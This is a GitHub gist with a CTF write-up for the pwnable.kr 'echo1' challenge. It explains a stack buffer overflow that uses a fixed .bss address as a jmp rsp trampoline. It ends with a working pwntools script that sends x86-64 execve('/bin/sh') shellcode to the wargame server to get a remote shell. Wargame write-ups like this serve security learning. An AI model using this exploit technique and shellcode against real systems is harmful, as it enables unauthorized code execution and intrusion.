Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Pwnable.kr echo1 writeup

Pwnable.kr echo1 writeup

ihciah@gmail.com

At first glance, I thought there are 3 ways to exploit this problem, since it gives me 3 choices: BOF, FSB, UAF, however, the last two are not available.

In echo1, it calls get_input to input 128 input, but the buffer equals to bp-20h, so it can only save data with max length of 32.

Above the return address is the old rbp, so we can write 32 + 8 trash and an address to jump to to overflow it.

After searching with jmpcall si in peda, we found no result.

There is an id in .bss which we can write into and the address is fixed.

So, we can input id with jmp esp hex code, write A*40 + id's addr + shellcode. (After leave; retn; the rsp will point to shellcode)

from pwn import *
#sh=process('/home/c/ctf/echo1')
sh=remote('pwnable.kr',9010)
shellcode="\x48\x31\xc0\x48\x83\xc0\x3b\x48\x31\xff\x57\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x8d\x3c\x24\x48\x31\xf6\x48\x31\xd2\x0f\x05"
sh.sendline(asm("jmp rsp",arch='amd64',os='linux'))
sh.sendline("1")
sh.sendline('A'*40+p64(0x6020A0)+shellcode)
sh.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.